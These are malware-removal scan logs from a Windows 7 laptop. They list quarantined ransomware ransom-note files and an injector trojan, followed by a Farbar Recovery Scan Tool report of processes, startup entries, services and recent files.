C:\AdwCleaner\Quarantine\C\ProgramData\Windows Genuine Advantage\{CBCBCB86-BA3D-4D93-ADDA-8722F1C63667}\msiexec.exe.vir a variant of Win32/Injector.BLLQ trojan cleaned by deleting - quarantined
C:\FRST\Quarantine\C\ProgramData\DECRYPT_INSTRUCTION.HTML.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\ProgramData\DECRYPT_INSTRUCTION.TXT.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\ProgramData\DECRYPT_INSTRUCTION.URL.xBAD Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\ProgramData\Norton\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Norton\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Norton\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\ProgramData\Skype\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\Plugins\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\Plugins\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\Plugins\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\Plugins\F57B48ADF2224F088EDD1A2B9BAD84E8\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\Plugins\F57B48ADF2224F088EDD1A2B9BAD84E8\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\Plugins\F57B48ADF2224F088EDD1A2B9BAD84E8\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\ehome\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\ehome\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\ehome\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\Art Cache\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\Art Cache\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\Art Cache\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\Art Cache\LocalMLS\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\Art Cache\LocalMLS\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\Art Cache\LocalMLS\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Messenger\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Messenger\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Messenger\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Outlook\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Outlook\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Outlook\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Windows Live Mail\Iinet.net ( d12\Deleted Items\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Windows Live Mail\Iinet.net ( d12\Deleted Items\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Windows Live Mail\Iinet.net ( d12\Deleted Items\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Windows Live Mail\Iinet.net ( d12\Drafts\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Windows Live Mail\Iinet.net ( d12\Drafts\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Windows Live Mail\Iinet.net ( d12\Drafts\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
 
 
 
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 10-09-2014
Ran by hesperia (administrator) on HESPERIA-PC on 13-09-2014 09:48:43
Running from E:\
Platform: Microsoft Windows 7 Home Premium  (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\cAudioFilterAgent.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFSwMgr.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosBtSrv.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosBtMng.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosA2dp.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosBtHid.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosBtHSP.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosAVRC.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosOBEX.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosBtProc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-03-16] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent.exe [496184 2010-03-23] (Conexant Systems, Inc.)
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [480608 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [742712 2010-03-04] (TOSHIBA Corporation)
HKLM\...\Run: [TWebCamera] => C:\Program Files\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [1797008 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2010-11-29] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [421160 2010-12-13] (Apple Inc.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2508104 2009-11-02] (CANON INC.)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.exe [767312 2009-09-04] (CANON INC.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284440 2011-10-17] (Intel Corporation)
HKLM\...\Run: [ToshibaServiceStation] => C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe [1295736 2011-02-11] (TOSHIBA Corporation)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2013-05-09] (Adobe Systems Incorporated)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth Manager.lnk
ShortcutTarget: Bluetooth Manager.lnk -> C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosBtMng.exe (TOSHIBA CORPORATION.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
SearchScopes: HKCU - {F4ED0519-C584-4DDA-BE93-FA0B93D040F6} URL = 
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (<TOSHIBA>)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll (Adblock Plus)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [152864] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @canon.com/EPPEX -> C:\Program Files\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
Chrome: 
=======
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AgereModemAudio; C:\Program Files\LSI SoftModem\agrsmsvc.exe [14336 2009-03-28] (LSI Corporation)
S3 cfWiMAXService; C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe [185712 2010-01-29] (TOSHIBA CORPORATION)
S3 ConfigFree Service; C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe [46448 2009-03-11] (TOSHIBA CORPORATION)
S3 MSSQL$MSSMLBIZ; c:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [44384 2010-12-10] (Microsoft Corporation)
R3 TMachInfo; C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [54136 2011-02-11] (TOSHIBA Corporation)
R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [189808 2010-03-17] (TOSHIBA Corporation)
S3 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [111960 2010-02-06] (TOSHIBA Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 amdkmdag; C:\windows\System32\DRIVERS\atipmdag.sys [5340160 2010-03-15] (ATI Technologies Inc.)
R3 CnxtHdmiAudService; C:\windows\System32\drivers\CHDMI32.sys [516152 2010-03-06] (Conexant Systems Inc.)
R3 PGEffect; C:\windows\System32\DRIVERS\pgeffect.sys [24064 2009-06-23] (TOSHIBA Corporation)
U5 AppMgmt; C:\windows\system32\svchost.exe [20992 2009-07-14] (Microsoft Corporation)
R3 catchme; \??\C:\Users\hesperia\AppData\Local\Temp\catchme.sys [X]
U3 mbr; \??\C:\ComboFix\mbr.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-13 09:10 - 2014-09-13 09:10 - 00000000 ____D () C:\Program Files\ESET
2014-09-13 09:04 - 2014-09-13 09:15 - 231030439 _____ () C:\Users\hesperia\Downloads\Windows6.1-KB947821-v33-x86.msu
2014-09-13 09:00 - 2014-09-13 09:14 - 563934504 _____ (Microsoft Corporation) C:\Users\hesperia\Downloads\windows6.1-KB976932-X86.exe
2014-09-13 08:53 - 2014-09-13 08:53 - 00002092 _____ () C:\Users\hesperia\Desktop\Rkill.txt
2014-09-13 08:52 - 2014-09-13 08:52 - 00000000 ____D () C:\Users\hesperia\Documents\Bluetooth
2014-09-13 08:50 - 2014-09-13 08:50 - 00110296 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-13 08:48 - 2014-09-13 08:48 - 00007466 _____ () C:\ComboFix.txt
2014-09-13 08:24 - 2014-09-13 08:24 - 00000000 ____D () C:\windows\system32\SPReview
2014-09-13 00:12 - 2014-09-13 08:48 - 00000000 ____D () C:\Qoobox
2014-09-13 00:12 - 2014-09-13 00:31 - 00000000 ____D () C:\windows\erdnt
2014-09-13 00:12 - 2011-06-26 14:45 - 00256000 _____ () C:\windows\PEV.exe
2014-09-13 00:12 - 2010-11-08 01:20 - 00208896 _____ () C:\windows\MBR.exe
2014-09-13 00:12 - 2009-04-20 12:56 - 00060416 _____ (NirSoft) C:\windows\NIRCMD.exe
2014-09-13 00:12 - 2000-08-31 08:00 - 00518144 _____ (SteelWerX) C:\windows\SWREG.exe
2014-09-13 00:12 - 2000-08-31 08:00 - 00406528 _____ (SteelWerX) C:\windows\SWSC.exe
2014-09-13 00:12 - 2000-08-31 08:00 - 00098816 _____ () C:\windows\sed.exe
2014-09-13 00:12 - 2000-08-31 08:00 - 00080412 _____ () C:\windows\grep.exe
2014-09-13 00:12 - 2000-08-31 08:00 - 00068096 _____ () C:\windows\zip.exe
2014-09-13 00:11 - 2014-09-13 00:11 - 05577449 ____R (Swearware) C:\Users\hesperia\Downloads\ComboFix.exe
2014-09-12 09:46 - 2014-09-12 09:46 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-10 18:08 - 2014-09-05 09:42 - 00444416 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-09-10 18:08 - 2014-09-05 09:38 - 00303104 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-09-10 17:34 - 2014-09-10 17:35 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:35 - 00001955 _____ () C:\Users\Public\Desktop\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:34 - 00000000 ____D () C:\Program Files\Adobe
2014-09-09 15:25 - 2014-09-13 08:17 - 00042790 _____ () C:\Users\hesperia\Downloads\Addition.txt
2014-09-09 15:24 - 2014-09-13 09:48 - 00000000 ____D () C:\FRST
2014-09-09 15:24 - 2014-09-13 08:17 - 00023631 _____ () C:\Users\hesperia\Downloads\FRST.txt
2014-09-09 15:23 - 2014-09-09 15:23 - 01097728 _____ (Farbar) C:\Users\hesperia\Downloads\FRST.exe
2014-09-09 15:12 - 2014-09-09 15:15 - 05185536 _____ (AVAST Software) C:\Users\hesperia\Downloads\aswmbr.exe
2014-09-09 14:47 - 2014-09-09 14:47 - 00001103 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00001091 _____ () C:\Users\Public\Desktop\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00000000 ____D () C:\Program Files\TeamViewer
2014-09-09 14:44 - 2014-09-09 14:44 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-09 14:41 - 2014-09-12 13:10 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-09 14:41 - 2014-09-09 14:41 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\48230029.sys
2014-09-09 14:41 - 2014-09-09 14:41 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-09 14:41 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-09-12 13:10 - 00000000 ____D () C:\Users\hesperia\Desktop\mbar
2014-09-09 14:40 - 2014-09-12 12:59 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-09-09 14:40 - 2014-09-09 14:40 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-09-09 14:33 - 2014-09-09 15:11 - 00000000 ____D () C:\Users\hesperia\Downloads\backups
2014-09-09 14:30 - 2014-09-09 14:35 - 00000000 ____D () C:\AdwCleaner
2014-09-09 14:28 - 2014-09-12 12:58 - 00000000 ____D () C:\windows\ERUNT
2014-09-09 14:24 - 2014-09-09 14:24 - 00388608 _____ (Trend Micro Inc.) C:\Users\hesperia\Downloads\HijackThis.exe
2014-09-08 18:32 - 2014-09-08 18:33 - 00232208 _____ () C:\windows\Minidump\090814-36613-01.dmp
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-13 09:48 - 2014-09-09 15:24 - 00000000 ____D () C:\FRST
2014-09-13 09:46 - 2010-12-18 19:09 - 00000000 ____D () C:\Users\hesperia\AppData\Local\VirtualStore
2014-09-13 09:45 - 2010-12-21 13:59 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Apple Computer
2014-09-13 09:45 - 2010-11-03 09:33 - 00000000 ____D () C:\ProgramData\Skype
2014-09-13 09:45 - 2010-11-03 09:02 - 00000000 ____D () C:\ProgramData\Norton
2014-09-13 09:40 - 2013-04-27 13:08 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-09-13 09:15 - 2014-09-13 09:04 - 231030439 _____ () C:\Users\hesperia\Downloads\Windows6.1-KB947821-v33-x86.msu
2014-09-13 09:14 - 2014-09-13 09:00 - 563934504 _____ (Microsoft Corporation) C:\Users\hesperia\Downloads\windows6.1-KB976932-X86.exe
2014-09-13 09:10 - 2014-09-13 09:10 - 00000000 ____D () C:\Program Files\ESET
2014-09-13 09:03 - 2010-11-03 08:45 - 02071459 _____ () C:\windows\WindowsUpdate.log
2014-09-13 08:54 - 2009-07-14 12:34 - 00016080 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-13 08:54 - 2009-07-14 12:34 - 00016080 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-13 08:53 - 2014-09-13 08:53 - 00002092 _____ () C:\Users\hesperia\Desktop\Rkill.txt
2014-09-13 08:52 - 2014-09-13 08:52 - 00000000 ____D () C:\Users\hesperia\Documents\Bluetooth
2014-09-13 08:51 - 2010-12-18 19:10 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Toshiba
2014-09-13 08:51 - 2010-11-03 09:00 - 00000000 ____D () C:\ProgramData\Toshiba
2014-09-13 08:51 - 2009-07-14 12:39 - 00145192 _____ () C:\windows\setupact.log
2014-09-13 08:50 - 2014-09-13 08:50 - 00110296 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-13 08:48 - 2014-09-13 08:48 - 00007466 _____ () C:\ComboFix.txt
2014-09-13 08:48 - 2014-09-13 00:12 - 00000000 ____D () C:\Qoobox
2014-09-13 08:47 - 2009-07-14 10:04 - 00000215 _____ () C:\windows\system.ini
2014-09-13 08:42 - 2012-04-24 14:31 - 00001945 _____ () C:\windows\epplauncher.mif
2014-09-13 08:24 - 2014-09-13 08:24 - 00000000 ____D () C:\windows\system32\SPReview
2014-09-13 08:17 - 2014-09-09 15:25 - 00042790 _____ () C:\Users\hesperia\Downloads\Addition.txt
2014-09-13 08:17 - 2014-09-09 15:24 - 00023631 _____ () C:\Users\hesperia\Downloads\FRST.txt
2014-09-13 07:47 - 2009-07-14 12:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-09-13 07:46 - 2010-12-19 11:01 - 00686528 _____ () C:\windows\PFRO.log
2014-09-13 00:31 - 2014-09-13 00:12 - 00000000 ____D () C:\windows\erdnt
2014-09-13 00:31 - 2009-07-14 10:37 - 00000000 ___RD () C:\Users\Public
2014-09-13 00:11 - 2014-09-13 00:11 - 05577449 ____R (Swearware) C:\Users\hesperia\Downloads\ComboFix.exe
2014-09-13 00:09 - 2010-07-07 09:15 - 00857936 _____ () C:\windows\system32\PerfStringBackup.INI
